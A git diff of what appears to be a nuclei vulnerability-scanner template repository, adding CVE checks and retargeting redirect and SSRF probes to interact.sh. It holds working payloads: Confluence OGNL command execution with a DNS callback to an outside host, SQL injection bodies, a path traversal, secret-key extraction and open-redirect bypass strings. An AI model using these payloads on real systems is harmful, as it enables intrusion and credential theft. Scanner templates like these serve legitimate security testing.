words: - "Content-Disposition: attachment;filename=test.txt" - "Set-Cookie:CRLFInjection=Test" - - "Location: example.com" + - "Location: interact.sh" - "X-XSS-Protection:0" part: header condition: and diff --git a/cves/2021/CVE-2021-27748.yaml b/cves/2021/CVE-2021-27748.yaml new file mode 100644 index 0000000000..51ee443d01 --- /dev/null +++ b/cves/2021/CVE-2021-27748.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-27748 + +info: + name: IBM WebSphere Portal SSRF + author: pdteam + severity: high + description: | + A Server Side Request Forgery vulnerability affects HCL Digital Experience, on-premise deployments and containers. + reference: + - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/ + - https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665 + classification: + cve-id: CVE-2021-27748 + tags: cve,cve2021,hcl,ibm,ssrf,websphere + +requests: + - method: GET + path: + - '{{BaseURL}}/docpicker/internal_proxy/http/interact.sh' + - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/interact.sh' + + redirects: true + max-redirects: 2 + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "

Interactsh Server

" \ No newline at end of file diff --git a/cves/2021/CVE-2021-27905.yaml b/cves/2021/CVE-2021-27905.yaml index 1fb8c47b82..f854a1c72a 100644 --- a/cves/2021/CVE-2021-27905.yaml +++ b/cves/2021/CVE-2021-27905.yaml @@ -27,7 +27,7 @@ requests: Connection: close - | - GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://example.com HTTP/1.1 + GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1 Host: {{Hostname}} Accept-Language: en Connection: close diff --git a/cves/2021/CVE-2021-29622.yaml b/cves/2021/CVE-2021-29622.yaml index 9ce1f43762..144d5434a0 100644 --- a/cves/2021/CVE-2021-29622.yaml +++ b/cves/2021/CVE-2021-29622.yaml @@ -19,10 +19,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/new/newhttp://example.com" + - "{{BaseURL}}/new/newhttp://interact.sh" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header diff --git a/cves/2021/CVE-2021-32618.yaml b/cves/2021/CVE-2021-32618.yaml index 87f4c0da7f..9516d961a3 100644 --- a/cves/2021/CVE-2021-32618.yaml +++ b/cves/2021/CVE-2021-32618.yaml @@ -6,7 +6,7 @@ info: severity: medium description: There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com - will pass FS's relative URL check however many browsers will gladly convert this to http://example.com. + will pass FS's relative URL check however many browsers will gladly convert this to http://interact.sh. reference: - https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c - https://github.com/Flask-Middleware/flask-security/issues/486 @@ -21,10 +21,10 @@ info: requests: - method: GET path: - - '{{BaseURL}}/login?next=\\\example.com' + - '{{BaseURL}}/login?next=\\\interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 \ No newline at end of file diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml index bceb482946..5f9932809c 100644 --- a/cves/2021/CVE-2021-3377.yaml +++ b/cves/2021/CVE-2021-3377.yaml @@ -20,7 +20,7 @@ info: requests: - raw: - |+ - GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1 + GET /\u001B]8;;https://interact.sh"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1 Host: {{Hostname}} Connection: close @@ -34,6 +34,6 @@ requests: - type: word words: - - "com\"/onmouseover=\"alert(1)\">" + - "sh\"/onmouseover=\"alert(1)\">" # Enhanced by mp on 2022/04/21 diff --git a/cves/2021/CVE-2021-34370.yaml b/cves/2021/CVE-2021-34370.yaml index e5f0e1ba3d..b315539242 100644 --- a/cves/2021/CVE-2021-34370.yaml +++ b/cves/2021/CVE-2021-34370.yaml @@ -20,10 +20,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/" + - "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header diff --git a/cves/2021/CVE-2021-34621.yaml b/cves/2021/CVE-2021-34621.yaml index 1cf1c27f69..7e6130d9e5 100644 --- a/cves/2021/CVE-2021-34621.yaml +++ b/cves/2021/CVE-2021-34621.yaml @@ -34,11 +34,11 @@ requests: -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_email" - {{randstr}}@example.com + {{randstr}}@interact.sh -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_password" - {{randstr}}@example.com + {{randstr}}@interact.sh -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_password_present" @@ -46,11 +46,11 @@ requests: -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_first_name" - {{randstr}}@example.com + {{randstr}}@interact.sh -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_last_name" - {{randstr}}@example.com + {{randstr}}@interact.sh -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="_wp_http_referer" @@ -89,7 +89,7 @@ requests: Origin: {{BaseURL}} Referer: {{BaseURL}} - log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In + log={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In - | GET /wp-admin/ HTTP/1.1 diff --git a/cves/2021/CVE-2021-3654.yaml b/cves/2021/CVE-2021-3654.yaml index 50332c40c1..8d04d97361 100644 --- a/cves/2021/CVE-2021-3654.yaml +++ b/cves/2021/CVE-2021-3654.yaml @@ -21,13 +21,13 @@ requests: - method: GET path: - - '{{BaseURL}}//example.com/%2f..' + - '{{BaseURL}}//interact.sh/%2f..' matchers-condition: and matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header - type: status diff --git a/cves/2021/CVE-2021-39501.yaml b/cves/2021/CVE-2021-39501.yaml index 4708455ae9..748fc229c4 100644 --- a/cves/2021/CVE-2021-39501.yaml +++ b/cves/2021/CVE-2021-39501.yaml @@ -20,12 +20,12 @@ requests: - method: GET path: - - '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://example.com' + - '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' # Enhanced by mp on 2022/03/16 diff --git a/cves/2021/CVE-2021-41826.yaml b/cves/2021/CVE-2021-41826.yaml index 4e82f41a4d..4ab7d97069 100644 --- a/cves/2021/CVE-2021-41826.yaml +++ b/cves/2021/CVE-2021-41826.yaml @@ -19,7 +19,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/auth/logout?continue=//example.com" + - "{{BaseURL}}/auth/logout?continue=//interact.sh" matchers-condition: and matchers: @@ -33,6 +33,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' # Enhanced by mp on 2022/02/27 diff --git a/cves/2021/CVE-2021-44528.yaml b/cves/2021/CVE-2021-44528.yaml index 266195bfe7..f2bb4ca0e0 100644 --- a/cves/2021/CVE-2021-44528.yaml +++ b/cves/2021/CVE-2021-44528.yaml @@ -21,14 +21,14 @@ requests: - | GET / HTTP/1.1 Host: {{Hostname}} - X-Forwarded-Host: //example.com + X-Forwarded-Host: //interact.sh matchers-condition: and matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' - type: status status: diff --git a/cves/2021/CVE-2021-45092.yaml b/cves/2021/CVE-2021-45092.yaml index 60a13263b4..66949d3421 100644 --- a/cves/2021/CVE-2021-45092.yaml +++ b/cves/2021/CVE-2021-45092.yaml @@ -19,7 +19,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/lab.html?vpath=//example.com" + - "{{BaseURL}}/lab.html?vpath=//interact.sh" matchers: - type: regex diff --git a/cves/2021/CVE-2021-46379.yaml b/cves/2021/CVE-2021-46379.yaml index d27fe97f68..a64ce02434 100644 --- a/cves/2021/CVE-2021-46379.yaml +++ b/cves/2021/CVE-2021-46379.yaml @@ -22,10 +22,10 @@ info: requests: - method: GET path: - - '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://example.com&wlan_id=1' + - '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2022/CVE-2022-0165.yaml b/cves/2022/CVE-2022-0165.yaml index 6819d8dae4..fedf338005 100644 --- a/cves/2022/CVE-2022-0165.yaml +++ b/cves/2022/CVE-2022-0165.yaml @@ -17,10 +17,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://example.com" + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh" matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' \ No newline at end of file diff --git a/cves/2022/CVE-2022-0692.yaml b/cves/2022/CVE-2022-0692.yaml index 47e1e5d356..15717f78c2 100644 --- a/cves/2022/CVE-2022-0692.yaml +++ b/cves/2022/CVE-2022-0692.yaml @@ -20,12 +20,12 @@ info: requests: - method: GET path: - - '{{BaseURL}}/index.php/example.com' + - '{{BaseURL}}/index.php/interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 # Enhanced by mp on 2022/03/08 diff --git a/cves/2022/CVE-2022-26134.yaml b/cves/2022/CVE-2022-26134.yaml new file mode 100644 index 0000000000..b0e5eb451b --- /dev/null +++ b/cves/2022/CVE-2022-26134.yaml @@ -0,0 +1,44 @@ +id: CVE-2022-26134 + +info: + name: Confluence - Remote Code Execution via OGNL template injection + author: pdteam,jbertman + severity: critical + description: | + Critical severity unauthenticated remote code execution vulnerability in Confluence Server and Data Center. + reference: + - https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis + - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html + - https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ + - https://jira.atlassian.com/browse/CONFSERVER-79016 + classification: + cve-id: CVE-2022-26134 + metadata: + shodan-query: http.component:"Atlassian Confluence" + tags: cve,cve2022,confluence,rce,ognl,oast + +requests: + - method: GET + path: + - "{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/" + - "{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/" + + stop-at-first-match: true + req-condition: true + matchers-condition: or + matchers: + - type: dsl + dsl: + - 'contains(to_lower(all_headers_1), "x-cmd-response:")' + + - type: dsl + dsl: + - 'contains(interactsh_protocol, "dns")' + - 'contains(to_lower(response_2), "confluence")' + condition: and + + extractors: + - type: kval + part: header + kval: + - "x_cmd_response" \ No newline at end of file diff --git a/cves/2022/CVE-2022-29383.yaml b/cves/2022/CVE-2022-29383.yaml new file mode 100644 index 0000000000..1daf703832 --- /dev/null +++ b/cves/2022/CVE-2022-29383.yaml @@ -0,0 +1,44 @@ +id: CVE-2022-29383 + +info: + name: NETGEAR ProSafe SSL VPN firmware - SQL Injection + author: elitebaz + severity: critical + description: | + NETGEAR ProSafe SSL VPN multiple firmwares were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi. + reference: + - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29383 + - https://nvd.nist.gov/vuln/detail/CVE-2022-29383 + - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383 + - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-29383 + metadata: + verified: "true" + tags: cve,cve2022,sqli,netgear,router + +requests: + - raw: + - | + POST /scgi-bin/platform.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=utf-8 + + thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd + + - | + POST /scgi-bin/platform.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=utf-8 + + thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd + + req-condition: true + matchers: + - type: dsl + dsl: + - contains(body_1, "User authentication Failed") + - contains(body_2, "User Login Failed for SSLVPN User.") + condition: and diff --git a/cves/2022/CVE-2022-31268.yaml b/cves/2022/CVE-2022-31268.yaml new file mode 100644 index 0000000000..55cb977531 --- /dev/null +++ b/cves/2022/CVE-2022-31268.yaml @@ -0,0 +1,46 @@ +id: CVE-2022-31268 + +info: + name: Gitblit 1.9.3 - Path traversal + author: 0x_Akoko + severity: high + description: | + A Path Traversal vulnerability in Gitblit 1.9.3 can lead to reading website files via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname). + reference: + - https://github.com/metaStor/Vuls/blob/main/gitblit/gitblit%20V1.9.3%20path%20traversal/gitblit%20V1.9.3%20path%20traversal.md + - https://www.cvedetails.com/cve/CVE-2022-31268 + - https://vuldb.com/?id.200500 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-31268 + cwe-id: CWE-22 + metadata: + shodan-query: http.html:"Gitblit" + verified: "true" + tags: cve,cve2022,lfi,gitblit + +requests: + - method: GET + path: + - "{{BaseURL}}/resources//../WEB-INF/web.xml" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "" + - "java.sun.com" + - "gitblit.properties" + condition: and + + - type: word + part: header + words: + - "application/xml" + + - type: status + status: + - 200 diff --git a/exposed-panels/eventum-panel.yaml b/exposed-panels/eventum-panel.yaml new file mode 100644 index 0000000000..cc3b49bb5a --- /dev/null +++ b/exposed-panels/eventum-panel.yaml @@ -0,0 +1,34 @@ +id: eventum-panel + +info: + name: Eventum Panel Detect + author: princechaddha + severity: info + metadata: + verified: true + shodan-query: http.favicon.hash:305412257 + tags: panel,eventum + +requests: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 2 + matchers-condition: or + matchers: + + - type: word + part: body + words: + - 'Login - Eventum' + - 'title="Eventum Issues search"' + condition: or + + - type: word + part: body + words: + - 'Database Error:' + - 'There seems to be a problem connecting to the database server specified in your configuration file' + condition: and diff --git a/exposed-panels/zte-panel.yaml b/exposed-panels/zte-panel.yaml index efaad36a63..5e82c398ee 100644 --- a/exposed-panels/zte-panel.yaml +++ b/exposed-panels/zte-panel.yaml @@ -2,23 +2,38 @@ id: zte-panel info: name: ZTE Panel - author: github.com/its0x08 + author: its0x08,idealphase severity: info + description: | + ZTE Corporation is a global leader in telecommunications and information technology. Founded in 1985 and listed on both the Hong Kong and Shenzhen Stock Exchanges, the company has been committed to providing innovative technologies and integrated solutions for global operators, government and enterprise, and consumers from over 160 countries across the globe.ZTE Corporation is a global leader in telecommunications and information technology. Founded in 1985 and listed on both the Hong Kong and Shenzhen Stock Exchanges, the company has been committed to providing innovative technologies and integrated solutions for global operators, government and enterprise, and consumers from over 160 countries across the globe. + reference: + - https://www.zte.com.cn/global/ + metadata: + verified: true + shodan-query: http.html:"ZTE Corporation" tags: panel,zte requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word + part: body words: - "ZTE Corporation. All rights reserved. " - '
' - part: body condition: and - type: word + part: header words: - "Mini web server 1.0 ZTE corp 2005." - part: header + + extractors: + - type: regex + part: body + group: 1 + regex: + - '
(.+)<\/font><\/div>' diff --git a/exposures/files/appsettings-file-disclosure.yaml b/exposures/files/appsettings-file-disclosure.yaml new file mode 100644 index 0000000000..2de7615d4a --- /dev/null +++ b/exposures/files/appsettings-file-disclosure.yaml @@ -0,0 +1,33 @@ +id: appsettings-file-disclosure + +info: + name: Application Setting file disclosure + author: DhiyaneshDK,tess + severity: high + description: | + appsetting.json file discloses the DB connection strings containing sensitive information. + reference: + - https://twitter.com/hacker_/status/1518003548855930882?s=20&t=BVauK0yUjVl5yL7rwy0Eag + metadata: + verified: true + tags: exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/appsettings.json" + + matchers-condition: and + matchers: + - type: word + words: + - "ConnectionStrings" + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 diff --git a/exposures/files/django-secret-key.yaml b/exposures/files/django-secret-key.yaml new file mode 100644 index 0000000000..6831eb3162 --- /dev/null +++ b/exposures/files/django-secret-key.yaml @@ -0,0 +1,46 @@ +id: django-secret-key + +info: + name: Django Secret Key Exposure + author: geeknik,DhiyaneshDk + severity: high + reference: https://docs.gitguardian.com/secrets-detection/detectors/specifics/django_secret_key + metadata: + verified: true + shodan-query: html:settings.py + tags: django,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/settings.py" + - "{{BaseURL}}/app/settings.py" + - "{{BaseURL}}/django/settings.py" + - "{{BaseURL}}/settings/settings.py" + - "{{BaseURL}}/web/settings/settings.py" + + stop-at-first-match: true + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "SECRET_KEY =" + + - type: word + part: header + words: + - "text/html" + negative: true + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '"DJANGO_SECRET_KEY", "(.*)"' diff --git a/exposures/files/ftpconfig.yaml b/exposures/files/ftpconfig.yaml new file mode 100644 index 0000000000..a89cd41288 --- /dev/null +++ b/exposures/files/ftpconfig.yaml @@ -0,0 +1,29 @@ +id: ftpconfig + +info: + name: Atom remote-ssh ftpconfig Exposure + author: geeknik,DhiyaneshDK + description: Created by remote-ssh for Atom, contains SFTP/SSH server details and credentials + severity: high + metadata: + verified: true + shodan-query: html:ftpconfig + tags: atom,ftp,config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/.ftpconfig" + + matchers-condition: and + matchers: + - type: word + words: + - '"protocol":' + - '"host":' + - '"user":' + condition: and + + - type: status + status: + - 200 diff --git a/exposures/files/git-mailmap.yaml b/exposures/files/git-mailmap.yaml new file mode 100644 index 0000000000..ee7f96f30c --- /dev/null +++ b/exposures/files/git-mailmap.yaml @@ -0,0 +1,33 @@ +id: git-mailmap + +info: + name: Git Mailmap File Disclosure + author: geeknik,DhiyaneshDK + severity: low + reference: https://man7.org/linux/man-pages/man5/gitmailmap.5.html + metadata: + verified: true + shodan-query: html:mailmap + tags: config,exposure,git,mailmap + +requests: + - method: GET + path: + - "{{BaseURL}}/.mailmap" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|\"(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21\\x23-\\x5b\\x5d-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])*\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\\[(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?|[a-z0-9-]*[a-z0-9]:(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21-\\x5a\\x53-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])+)\\])" + + - type: word + part: body + words: + - "# Theresa O'Connor:" + negative: true + + - type: status + status: + - 200 diff --git a/exposures/files/php-ini.yaml b/exposures/files/php-ini.yaml new file mode 100644 index 0000000000..55d277398e --- /dev/null +++ b/exposures/files/php-ini.yaml @@ -0,0 +1,32 @@ +id: php-ini + +info: + name: Php.ini File Disclosure + author: geeknik,DhiyaneshDK + severity: low + reference: https://www.php.net/manual/en/configuration.file.php + metadata: + verified: true + shodan-query: php.ini + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/php.ini" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "[PHP]" + - "short_open_tag" + - "safe_mode" + - "expose_php" + condition: and + + - type: status + status: + - 200 diff --git a/misconfiguration/caddy-open-redirect.yaml b/misconfiguration/caddy-open-redirect.yaml index 4e43996064..40f51f9b7c 100644 --- a/misconfiguration/caddy-open-redirect.yaml +++ b/misconfiguration/caddy-open-redirect.yaml @@ -11,10 +11,10 @@ info: requests: - method: GET path: - - '{{BaseURL}}//example.com/%2F..' + - '{{BaseURL}}//interact.sh/%2F..' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 \ No newline at end of file diff --git a/token-spray/api-debounce.yaml b/token-spray/api-debounce.yaml index 2ed95d091b..2c1aef9552 100644 --- a/token-spray/api-debounce.yaml +++ b/token-spray/api-debounce.yaml @@ -13,7 +13,7 @@ self-contained: true requests: - method: GET path: - - "https://api.debounce.io/v1/?api={{token}}&email=test@example.com" + - "https://api.debounce.io/v1/?api={{token}}&email=test@interact.sh" matchers: - type: word diff --git a/token-spray/api-fullhunt.yaml b/token-spray/api-fullhunt.yaml index dd160e504b..f69fd590db 100644 --- a/token-spray/api-fullhunt.yaml +++ b/token-spray/api-fullhunt.yaml @@ -15,7 +15,7 @@ self-contained: true requests: - method: GET path: - - https://fullhunt.io/api/v1/domain/example.com/details + - https://fullhunt.io/api/v1/domain/interact.sh/details headers: X-API-Key: "{{token}}" diff --git a/token-spray/api-sslmate.yaml b/token-spray/api-sslmate.yaml index 940d325e12..4454c7c339 100644 --- a/token-spray/api-sslmate.yaml +++ b/token-spray/api-sslmate.yaml @@ -14,7 +14,7 @@ self-contained: true requests: - method: GET path: - - https://sslmate.com/api/v2/certs/example.com?expand=current.crt + - https://sslmate.com/api/v2/certs/interact.sh?expand=current.crt headers: Authorization: Bearer {{token}} diff --git a/vulnerabilities/generic/cache-poisoning.yaml b/vulnerabilities/generic/cache-poisoning.yaml index 1703f38d93..88f4e1af9f 100644 --- a/vulnerabilities/generic/cache-poisoning.yaml +++ b/vulnerabilities/generic/cache-poisoning.yaml @@ -13,9 +13,9 @@ requests: - raw: - | GET /?{{randstr}}=9 HTTP/1.1 - X-Forwarded-Prefix: prefix.cache.example.com - X-Forwarded-Host: host.cache.example.com - X-Forwarded-For: for.cache.example.com + X-Forwarded-Prefix: prefix.cache.interact.sh + X-Forwarded-Host: host.cache.interact.sh + X-Forwarded-For: for.cache.interact.sh - | GET /?{{randstr}}=9 HTTP/1.1 @@ -24,10 +24,10 @@ requests: matchers: - type: dsl dsl: - - 'contains(body_2, "cache.example.com")' + - 'contains(body_2, "cache.interact.sh")' extractors: - type: regex part: response regex: - - "(prefix|host|for).cache.example.com" + - "(prefix|host|for).cache.interact.sh" diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml index 2598c937eb..7e6cd07c7e 100644 --- a/vulnerabilities/generic/open-redirect.yaml +++ b/vulnerabilities/generic/open-redirect.yaml @@ -15,94 +15,94 @@ requests: payloads: redirect: - - '%0a/example.com/' - - '%0d/example.com/' - - '%00/example.com/' - - '%09/example.com/' - - '%5C%5Cexample.com/%252e%252e%252f' - - '%5Cexample.com' - - '%5cexample.com/%2f%2e%2e' - - '%5c{{RootURL}}example.com/%2f%2e%2e' - - '../example.com' - - '.example.com' - - '/%5cexample.com' - - '////\;@example.com' - - '////example.com' - - '///example.com' - - '///example.com/%2f%2e%2e' - - '///example.com@//' - - '///{{RootURL}}example.com/%2f%2e%2e' - - '//;@example.com' - - '//\/example.com/' - - '//\@example.com' - - '//\example.com' - - '//\texample.com/' - - '//example.com/%2F..' - - '//example.com//' - - '//example.com@//' - - '//example.com\texample.com/' - - '//https://example.com@//' - - '/<>//example.com' - - '/\/\/example.com/' - - '/\/example.com' - - '/\example.com' - - '/example.com' - - '/example.com/%2F..' - - '/example.com/' - - '/example.com/..;/css' - - '/https:example.com' - - '/{{RootURL}}example.com/' - - '/〱example.com' - - '/〵example.com' - - '/ゝexample.com' - - '/ーexample.com' - - '/ーexample.com' - - '<>//example.com' - - '@example.com' - - '@https://example.com' - - '\/\/example.com/' - - 'example%E3%80%82com' - - 'example.com' - - 'example.com/' - - 'example.com//' - - 'example.com;@' - - 'https%3a%2f%2fexample.com%2f' - - 'https:%0a%0dexample.com' - - 'https://%0a%0dexample.com' - - 'https://%09/example.com' - - 'https://%2f%2f.example.com/' - - 'https://%3F.example.com/' - - 'https://%5c%5c.example.com/' - - 'https://%5cexample.com@' - - 'https://%23.example.com/' - - 'https://.example.com' - - 'https://////example.com' - - 'https:///example.com' - - 'https:///example.com/%2e%2e' - - 'https:///example.com/%2f%2e%2e' - - 'https:///example.com@example.com/%2e%2e' - - 'https:///example.com@example.com/%2f%2e%2e' - - 'https://:80#@example.com/' - - 'https://:80?@example.com/' - - 'https://:@\@example.com' - - 'https://:@example.com\@example.com' - - 'https://:@example.com\@WillBeReplaced.com' - - 'https://;@example.com' - - 'https://\texample.com/' - - 'https://example.com/example.com' - - 'https://example.com/https://example.com/' - - 'https://www.\.example.com' - - 'https:/\/\example.com' - - 'https:/\example.com' - - 'https:/example.com' - - 'https:example.com' - - '{{RootURL}}example.com' - - '〱example.com' - - '〵example.com' - - 'ゝexample.com' - - 'ーexample.com' - - 'ーexample.com' - - 